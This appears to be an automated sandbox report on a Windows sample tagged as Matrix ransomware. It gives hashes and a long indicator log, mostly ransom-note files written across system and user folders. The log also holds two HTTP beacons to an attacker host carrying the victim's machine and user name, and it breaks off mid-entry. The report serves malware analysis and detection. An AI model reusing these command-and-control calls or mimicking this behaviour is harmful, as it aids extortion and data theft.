Analysis
-
max time kernel
92s -
max time network
86s -
platform
windows7_x64 -
resource
win7 -
submitted
08/10/2020, 15:06
Static task
static1
Behavioral task
behavioral1
Sample
a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe
Resource
win7
Behavioral task
behavioral2
Sample
a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe
Resource
win10v200722
General
-
Target
a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe
-
Size
1.2MB
-
MD5
6fe408f8b05946b1bb862fc20b6affff
-
SHA1
038e85d70ade727259bd2ad5f70d4d7890c88924
-
SHA256
a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9
-
SHA512
b41eae36b7db0d2aac948c463ad443de7e3bf6762965923d4f9c65b8ff5eab86bff29fa35a7fb25247be5ca77e8abb1d4f391308f3f63617a52a2bb6b226b0b8
Malware Config
Signatures
-
Matrix Ransomware 460 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe HTTP URL 6 http://ghb.timerz.org/addrecord.php?apikey=fdfk22_api_key&compuser=AVGLFESB|Admin&sid=QDt9lZpMWmiaUx2c&phase=659FAAE06715E629|3340|1GB Process not Found File created C:\Users\Admin\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\d5vrebxd.default-release\startupCache\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\management\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Public\Downloads\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Pictures\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\MSBuild\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\83.0.4103.106\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\amd64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AJM03J3Y\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\fonts\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZMLBLRQ7\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\uninstall\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Favorites\Links\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\_platform_specific\win_x64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\d5vrebxd.default-release\OfflineCache\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\datareporting\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Favorites\MSN Websites\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Favorites\Microsoft Websites\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\images\cursors\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe HTTP URL 2 http://ghb.timerz.org/addrecord.php?apikey=fdfk22_api_key&compuser=AVGLFESB|Admin&sid=QDt9lZpMWmiaUx2c&phase=START Process not Found File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\d5vrebxd.default-release\cache2\entries\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\FDFK22_INFO.rtf 